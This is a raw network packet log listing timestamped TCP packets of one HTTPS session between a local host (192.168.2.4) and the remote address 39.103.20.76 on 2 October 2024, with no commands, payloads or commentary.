Oct 2, 2024 04:27:35.842479944 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842488050 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842516899 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842535973 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842547894 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842592001 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842606068 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842611074 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842643023 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842664003 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842664957 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842684031 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842725992 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842741013 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842793941 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842824936 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842880011 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842886925 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842891932 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842927933 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842947006 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842957020 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843027115 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843044043 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843096018 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843102932 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843115091 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843152046 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843173027 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843235016 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843290091 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843317032 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843362093 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843377113 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843386889 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843406916 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843427896 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843513012 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843558073 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843564987 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843570948 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843601942 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843620062 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843626022 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843631983 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843666077 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843667030 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843699932 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843704939 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843719959 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843734026 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843772888 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843776941 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843817949 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843858004 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843909025 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843909979 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843924046 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.843962908 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.843987942 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.844038963 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.845434904 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.845495939 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.845520973 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.845575094 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.845633984 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.845688105 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.845706940 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.845711946 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.845731974 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.845757008 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.856333971 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.922564030 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.922611952 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.922650099 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.922657013 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.922713995 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.933381081 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.933444977 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.933461905 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.933469057 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.933496952 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.933496952 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.933526993 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.933532000 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.933562994 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.933577061 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.933584929 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.933617115 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.933619022 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.933641911 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.933645964 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.933661938 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.933707952 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.933717012 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.933753014 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.933763981 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.933775902 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.933779001 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.933820009 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.934035063 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.934089899 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.934092045 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.934103966 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.934144020 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.934158087 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.934210062 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.934271097 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.934324026 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.934359074 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.934401035 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.934427977 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.934434891 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.934446096 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.934477091 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.934501886 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.934554100 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.934562922 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.934570074 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.934607983 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935041904 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935096025 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935103893 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935165882 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935169935 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935178041 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935215950 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935229063 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935240984 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935245991 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935280085 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935311079 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935312986 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935323000 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935362101 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935400963 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935463905 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935559988 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935611963 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935626984 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935632944 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935666084 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935673952 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935687065 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935692072 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935717106 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935724974 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935765982 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.935770988 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.935816050 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.936369896 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.936429024 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.936456919 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.936508894 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.936511040 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.936520100 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.936559916 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.936573029 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.936641932 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.956176043 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.013601065 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.013663054 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.013797998 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.013797998 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.013806105 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.013849974 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.024292946 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.024363041 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.024375916 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.024431944 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.024431944 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.024446964 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.024493933 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.024493933 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.024506092 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.024544954 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.024548054 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.024560928 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.024601936 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.024616003 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.024678946 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.024703979 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.024755955 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.024760008 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.024769068 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.024811029 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.025118113 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.025165081 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.025181055 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.025187016 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.025211096 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.025233984 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.025259972 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.025316954 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.025320053 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.025327921 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.025388956 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.025510073 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.025554895 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.025576115 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.025580883 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.025605917 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.025614023 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.025630951 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.025636911 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.025657892 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.025667906 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.025718927 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.025722980 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.025774002 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026228905 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026279926 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026297092 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026303053 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026329994 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026335001 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026359081 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026364088 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026381969 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026396036 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026429892 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026438951 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026446104 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026484013 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026488066 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026496887 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026530981 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026539087 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026555061 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026560068 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026592016 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026597977 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026627064 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026632071 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026654959 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026664019 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026710987 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026715994 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026726007 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026761055 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026767015 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.026796103 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.026830912 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.027376890 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.027431011 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.027471066 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.027513027 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.027529001 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.027534008 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.027565002 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.027585983 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.052998066 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.394473076 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.394632101 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.394670010 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.394689083 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.394771099 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.394771099 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.394799948 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.394876957 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.394897938 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.394922972 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.394928932 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.395001888 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.395003080 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.395031929 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.395090103 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.395111084 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.395164967 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.395226002 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.395261049 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.395317078 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.395379066 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.395454884 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.395490885 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.395546913 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.395601034 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.395654917 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.395715952 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.395778894 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.395814896 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.395869970 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.395911932 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.395970106 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.396007061 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.396064043 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.396105051 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.396164894 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.396219969 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.396291971 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.396336079 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.396394968 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.396445036 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.396507025 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.396533966 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.396593094 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.396635056 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.396692991 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.396725893 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.396781921 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.396837950 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.396894932 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.396931887 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.396980047 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.397041082 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.397098064 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.397142887 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.397198915 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.397254944 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.397308111 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.397372007 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.397429943 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.397468090 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.397525072 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.397567034 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.397623062 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.397661924 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.397774935 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.397803068 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.397859097 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.397896051 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.397954941 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.398008108 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.398063898 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.398118019 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.398174047 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.398230076 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.398297071 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.398345947 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.398407936 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.398439884 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:36.398500919 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:36.398535013 CEST	443	49740	39.103.20.76	192.168.2.4
